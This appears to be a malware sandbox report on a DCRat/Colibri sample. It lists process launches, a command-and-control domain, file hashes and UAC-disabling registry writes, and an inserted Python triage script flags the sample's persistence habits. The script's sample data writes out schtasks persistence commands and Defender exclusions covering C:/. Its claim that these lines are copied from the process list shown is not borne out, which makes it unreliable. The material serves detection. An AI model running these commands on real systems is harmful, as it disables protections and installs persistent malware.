"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e66d39f-fbd5-4c52-970c-e552e9bc9e55.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e430e252-e5f5-45b6-a030-9a719da2b330.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95932655-c738-490b-b26f-ab1a6bf3f3b6.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32f9b173-8f76-464c-b3cc-53ebd4189533.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\621e4bb5-ea86-4af6-8bbd-359974861059.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86000b1e-ea65-4f43-973d-d5dfc0415136.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2c2f8a08-4d44-48a7-a649-7178c41ca286.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb541896-b775-4315-b5ff-f6ea9288c609.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b959eb7-5698-48e1-97bb-56085a85d3d4.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4e51c0d6-98e3-4963-877f-889aaa8eea97.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da0aa89d-aa3b-48b2-878c-80493f910f67.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e51f38fd-9ba6-4250-a4c8-2d9006856539.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28733509-40e2-4a82-8428-b0664447d8fd.vbs"
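The process list above is the whole DCRat installation routine in three moves: schtasks registers each dropped copy twice under a name derived from the file name (one ONLOGON task, one every-few-minutes task, /rl HIGHEST, /f so a later create silently replaces an earlier one), and every copy borrows a Windows binary name (services.exe, lsm.exe, wininit.exe, sppsvc.exe, audiodg.exe, OSPPSVC.exe, WMIADAP.exe, WmiPrvSE.exe, Idle.exe) while living far outside System32; powershell then adds Defender path exclusions for C:\ and every top-level folder on it; finally cmd.exe runs the dropped .bat, which calls w32tm /stripchart against localhost as a few-second delay and then starts the renamed copy, which in turn chains through WScript.exe and more copies of itself. The Python below is an added example, not part of this report or of the sandbox's tooling: it runs the checks a responder would want over process command lines of this shape (Sysmon Event ID 1 or EDR process-creation telemetry). The SYSTEM_NAMES watchlist, the cadence threshold and the path-depth rule are this example's assumptions; the sample command lines are copied from the list above.

```python
"""Added example (not from the sandbox report): triage process command lines
for the three DCRat habits visible in the report's Processes list:
  1. schtasks /create whose target carries a Windows system-binary name but
     lives outside System32, runs at highest level, or re-launches every few
     minutes under a task name that mirrors the file name;
  2. Add-MpPreference -ExclusionPath at drive-root or top-level-folder depth;
  3. w32tm /stripchart /computer:localhost used as a sleep substitute."""
import re

# Names the sample reused for its copies (constructed watchlist; extend with other System32 names).
SYSTEM_NAMES = {"services.exe", "lsm.exe", "wininit.exe", "sppsvc.exe", "audiodg.exe",
                "idle.exe", "osppsvc.exe", "wmiadap.exe", "wmiprvse.exe"}
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def _quoted(cmd, flag):
    """Value of a schtasks /flag written as "value" or "'value'" (names and paths)."""
    m = re.search(r'/%s\s+"\'?([^"\']+)\'?"' % flag, cmd, re.IGNORECASE)
    return m.group(1) if m else None

def _bare(cmd, flag):
    """Value of a schtasks /flag written as a bare token (MINUTE, 10, HIGHEST)."""
    m = re.search(r"/%s\s+(\S+)" % flag, cmd, re.IGNORECASE)
    return m.group(1) if m else None

def parse_schtasks(cmd):
    """Fields of a 'schtasks /create' command line, or None for anything else."""
    if not re.search(r'schtasks(\.exe)?"?\s+/create\b', cmd, re.IGNORECASE):
        return None
    return {
        "tn": _quoted(cmd, "tn"),
        "sc": (_bare(cmd, "sc") or "").upper(),
        "mo": int(_bare(cmd, "mo") or 0),
        "rl": (_bare(cmd, "rl") or "LIMITED").upper(),   # schtasks default run level
        "tr": _quoted(cmd, "tr") or "",
    }

def schtasks_findings(task):
    """Findings for one parsed task: masquerading path, run level, cadence, naming."""
    out = []
    path = task["tr"]
    folder, _, base = path.lower().rpartition("\\")
    if base in SYSTEM_NAMES and not folder.startswith(TRUSTED_DIRS):
        out.append("system-binary name outside System32: " + path)
    if task["rl"] == "HIGHEST":
        out.append("task requests highest run level")
    if task["sc"] == "MINUTE" and 0 < task["mo"] <= 15:   # threshold is an assumption
        out.append("re-launched every %d minutes" % task["mo"])
    stem = base.rpartition(".")[0]
    tn = (task["tn"] or "").lower()
    if stem and tn.startswith(stem) and len(tn) - len(stem) <= 1:
        out.append("task name mirrors the target file name: " + task["tn"])
    return out

EXCL_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.IGNORECASE)

def exclusion_finding(cmd):
    """Flag Defender path exclusions at drive-root or top-level-folder depth."""
    m = EXCL_RE.search(cmd)
    if not m:
        return None
    path = m.group(1).replace("/", "\\").rstrip("\\")
    if path.count("\\") <= 1:                 # 'C:' -> 0, 'C:\Windows' -> 1
        return "Defender exclusion covers whole volume or top-level folder: " + m.group(1)
    return None

def delay_finding(cmd):
    """w32tm /stripchart against localhost only burns time; droppers use it as sleep."""
    if re.search(r"w32tm\s+/stripchart\s+/computer:localhost", cmd, re.IGNORECASE):
        return "w32tm /stripchart against localhost: a few seconds' delay before the next stage"
    return None

def triage(cmdlines):
    """Map each command line that trips a check to its list of findings."""
    report = {}
    for cmd in cmdlines:
        task = parse_schtasks(cmd)
        findings = schtasks_findings(task) if task else []
        findings += [f for f in (exclusion_finding(cmd), delay_finding(cmd)) if f]
        if findings:
            report[cmd] = findings
    return report

# Command lines copied from the report's Processes list (a representative subset).
SAMPLE_CMDLINES = r'''
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /f
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"
'''.strip().splitlines()

if __name__ == "__main__":
    for cmd, findings in triage(SAMPLE_CMDLINES).items():
        print(cmd[:70], "->", "; ".join(findings))
```

The bare WMIADAP.exe launch deliberately produces no finding: on its own a process start in Program Files is unremarkable, and it is the task pair and the exclusion that make it worth pulling. On a suspected host the same tasks are enumerated with `schtasks /query /fo LIST /v` and the exclusions with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`; removing the exclusions and tasks before deleting the copies avoids the MINUTE tasks re-launching a copy mid-cleanup.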

Network

Country Destination Domain Proto
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp

Files

memory/2360-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

memory/2360-1-0x0000000000040000-0x0000000000534000-memory.dmp

memory/2360-2-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

memory/2360-3-0x000000001BA40000-0x000000001BB6E000-memory.dmp

memory/2360-4-0x0000000000790000-0x00000000007AC000-memory.dmp

memory/2360-5-0x00000000007B0000-0x00000000007B8000-memory.dmp

memory/2360-6-0x00000000007C0000-0x00000000007D0000-memory.dmp

memory/2360-7-0x00000000007F0000-0x0000000000806000-memory.dmp

memory/2360-8-0x00000000007D0000-0x00000000007E0000-memory.dmp

memory/2360-9-0x0000000000810000-0x000000000081A000-memory.dmp

memory/2360-10-0x0000000000820000-0x0000000000832000-memory.dmp

memory/2360-11-0x0000000000830000-0x000000000083A000-memory.dmp

memory/2360-12-0x00000000009C0000-0x00000000009CE000-memory.dmp

memory/2360-13-0x00000000009D0000-0x00000000009DE000-memory.dmp

memory/2360-14-0x00000000009E0000-0x00000000009E8000-memory.dmp

memory/2360-15-0x00000000009F0000-0x00000000009F8000-memory.dmp

memory/2360-16-0x0000000000A00000-0x0000000000A0C000-memory.dmp

C:\Windows\AppCompat\Programs\OSPPSVC.exe

MD5 6e7923159a06c48bb09a81080d2d8266
SHA1 a2126afd2d75f3dedb602fd7f63b9940e0b47c22
SHA256 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
SHA512 d2ddd13c739e92febab2685f393aeed15140c4b03d3c15ec49c86bac764ab6e3a01982a64118bd9d4e700161b85e1a7f3a91f904322ecc17d6253174a08f4365

C:\Users\Default\Videos\RCXEF56.tmp

MD5 2931e6e3e42233d9b7e650bce7435f36
SHA1 34eb80ddcf0438f5627e8b12be7a22a2de2b7a6e
SHA256 d8f391f6ab24765685b90a9815f3ff80dc3825f73dcaecf2aa25d786feb290bf
SHA512 6d3be094a7bc7809bf5bea9271b0dc3ca34ab6172cb33037bbc45385ae483f2a273f36de7aca68a045ace98a99450b1eba8f81686d4b01691375f595c057a692

memory/2360-128-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 628dc3ec330924cd33ec8371221dd65c
SHA1 5c3d88d4618a27908ecf80f98f2d8d473839a04b
SHA256 0dd56785cb0022cb5ab9b99ece4239297248d5065af6a5dece80f9698a619bd5
SHA512 a090664d56d09a181b4710fba9526f379638af0fa7a666ea07569f38e24a4ba5b0ed6b0f24c1b8f5b4768ec3c01c76d1c12c7b164ac77487eb3c2509ac6f0f5e

memory/2600-152-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2600-151-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/2360-172-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hs0sn2L6wi.bat

MD5 cf094da7c9fa2ca9ca0ce3eb3bc24905
SHA1 118e08c083158eb8d49a34ab57b732038d7f01ed
SHA256 1a3d5e594d2261b07866caa156976a854bff8f40b03212e37cca9dd4cd7a2991
SHA512 7d712718e53425602a8110181334e3355e674376b7040faf76d7767e15b14198aca906a25095b97798636563c37a1ea1f43cf76e5df72032a16fe28da75595fd

memory/2124-207-0x0000000000F00000-0x00000000013F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3fc57db3-e45e-4322-8a73-b1b80b2d87a8.vbs

MD5 d40872492033fdc6863a3f6ea94f5e9e
SHA1 4251f7287871540f6c6d2e5bba184c92ae0376e4
SHA256 701bebb58771b0617fcead66fda1c3a93c5b12ccf6fe694650f4a281ec64e7a3
SHA512 f6ed939134deb797da120fb43aed95efbd5b91e7dfd64eb92bdc951d9aa35d94c5b6f3ab52d66ad66096c3cd0651fe484838f028623ba8af16af8ac508bbfb67

C:\Users\Admin\AppData\Local\Temp\d3cdb8ee-0726-4212-b937-b3beddfec743.vbs

MD5 bd3f74c53f228f7bd3ed7b1f13b5f3eb
SHA1 e9a0a72fbecf1f0b99d10bf7792b1c870b49b084
SHA256 410f95bcd6471ed4b24c695dd58ab2c8495f9f96e2b2711dba958a52bda71236
SHA512 7d9d586d6ad705d9b1cdb99bd934cae5ec5836f1c0125dd748020cfc2bf5c6b67a856814b0baa162eb2d7592cd34761cf6bedeca453a62ec0e5d4fcdb8212c3b

C:\Users\Admin\AppData\Local\Temp\tmp26E2.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

C:\Users\Admin\AppData\Local\Temp\3b2a2203-4a5d-4a4a-a926-4c350a596aa9.vbs

MD5 cceaad656d19f25ac987f2b83b251f29
SHA1 86312088f14a84ef577ea94a63332a9265628c37
SHA256 5133b1e7c0df63d5991e82180a15afc9582e73ed3942ba269181b8b13d8326ac
SHA512 b893f4033b6978f7150c38c97194b37add52e5a14bc1808fe21d06f3466df74e193bb1a1371f0ecc2a357c1a3500accb79311f3d871e254a36b3e4a3c5cb4fb6

memory/2772-235-0x00000000008A0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b3a74449-cbc7-4681-8a73-247704307d6d.vbs

MD5 7904c55d5f164923e3fc85e32e8d2ec7
SHA1 9980c8880024f9b160a0b42ac9252338e7f46133
SHA256 5b87be83c9c8c599c8e30e4b3b5257e7a28af928afc0b2b1ecb15c7c4808c9f8
SHA512 8f72ce7b4f052243e53727f935440e5452985799597b56a8eed2ffebdf29e61528ea383d786d22bfde39bd92c60514c9decae4180cf291ec0342663d8af3048e

C:\Users\Admin\AppData\Local\Temp\53e2a958-5a4b-41d6-9f4e-c25d3c55600f.vbs

MD5 d12a0f0cfb4190390948d83562781d1e
SHA1 cc9294211b3c2c24b0bc76936819ccd6789c961a
SHA256 402fb2ea1ebcec0e2db2754df6e1c0dca341a97e6e4248f761b75441754e6bd7
SHA512 aa22250b61ebb3862c00b739f76b7b00980dce14af878a32a15c3698f0fe6bd62c9b93074eeff1cf2f4d7d68e6791911ea83cbea6ce0f3c4c3b97849e66bfcfc

memory/1944-264-0x0000000000F80000-0x0000000001474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2e32edd9-6e70-4578-94ef-ee9f3be44825.vbs

MD5 77cefa19386b86b69fce53e37b631056
SHA1 033e02c5eeec35dbcc2ddedb46f42355757330a1
SHA256 6bffcecdf5645012551787c385e302f5942c5e865e2a03e60d234e823c8f1d48
SHA512 cf8d4ee461649ee05cad98c7ccff3b1fd445dc0e9e025dd310d8daf92edcef4813b783b35882d65223e15c3db869c25f58e3d30a4152f7e4be46a3052d890e8c

C:\Users\Admin\AppData\Local\Temp\e430e252-e5f5-45b6-a030-9a719da2b330.vbs

MD5 d5c186139e74b1fe59ad6de13331b3ac
SHA1 16e7187a8c1a9118b4dd6e7639892c5071166c43
SHA256 2f7bf5349e18f8a64bb9a9d993816a40588b3a5d169208b8e4f2bb07c6e181b3
SHA512 1fbaec516d998094df33f25cc904f1fcf0498f74893e336e96fa4c0bb00685cb05319f465b7056538e962bd5b8567f531e775f886abb06ee5874c1cddc7d6fc6

memory/1136-293-0x00000000010F0000-0x00000000015E4000-memory.dmp

memory/1136-294-0x00000000007B0000-0x00000000007C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\32f9b173-8f76-464c-b3cc-53ebd4189533.vbs

MD5 9f11a492b0603d73bbfbb625c3b25c41
SHA1 8cbc0478fe7e49aeed547983229f9abb336fe7a6
SHA256 8be0e250de8c3b01afa6c8306d1159868cd186098baf7706d4915e681416c9bd
SHA512 a1b58fe60affafb7bf3e5e0311190360fca099177b00c12adf61daba6fa2d17e82c8986f1a86f7981f53503ffa707159d4ab082fb51011d3c9cb6e434a5d455a

C:\Users\Admin\AppData\Local\Temp\86000b1e-ea65-4f43-973d-d5dfc0415136.vbs

MD5 bf8c598bdb6755214177f00ff5fc8956
SHA1 13a185e2de9b453ecfd06bd997ef146207fc3402
SHA256 fc39641f8bebf6184ca5ab21657c7e83d4c0cbe0ce19d3e16e2439c0e619d30c
SHA512 5412bc193aa39d58bd08f919c6d7bcbd64d5267c58c2a52c54bd23025f645f6636f63abe4955c3f9d0698ec70f7c477a7047540f745343f1ff18edd88be4e376

C:\Users\Admin\AppData\Local\Temp\fb541896-b775-4315-b5ff-f6ea9288c609.vbs

MD5 dc4c43599351d067f4c44ccacddfdf6d
SHA1 61b2bea41fdba7b0ef9c4610ebe0f82d67329414
SHA256 d7b077ea5293f46a2cb9cf039c8f94902e5452d198758eaf26e47040fcdbdae4
SHA512 0538f85577c86038f2dcb54f1528dcc3a3b617551d2b1a24e07362ca166f6281c762b817b5473a61f28f8cbd90d25a2b14ef77b540fbc911701698e4121b9f8a

memory/1860-337-0x0000000000330000-0x0000000000824000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4e51c0d6-98e3-4963-877f-889aaa8eea97.vbs

MD5 7b6c3666ce9e445d1f15208ac4c514be
SHA1 71bb09182c207711a93e7652900a320d84d5b1c2
SHA256 b316248992ee5b92d1932279edb859dd986570ce1e8c9120435bcdb38d7c530a
SHA512 74ac0e4827e99fff5897fbb888d9dd677b8b0c9e307443f2f2df41038bf23e2922ff62930e03e1a2f129173cd172c173de21087c28da8e522143a155f9a982f9

memory/1780-352-0x0000000000C00000-0x00000000010F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e51f38fd-9ba6-4250-a4c8-2d9006856539.vbs

MD5 4020aae06740cb966b8baa521dad25ab
SHA1 a8e479e29ceebdd299995e9f9809089df76a5ac0
SHA256 b6e7e4e2b70a6355246853272fb38d93471d61a76cc6c9db46ab178c119d4a50
SHA512 e3eaeb42bce372a93268615ed02c1ea322e2f4172719105cb33035810dccf5f865e8c9ff85a702f5b2f31c09b83f41b92ffc7570484c3b7b0ee6e4d0fd66ff4e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-17 04:57

Reported

2024-11-17 04:59

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

Signatures

Colibri Loader

loader colibri

Colibri family

colibri

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |

UAC bypass

evasion trojan
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
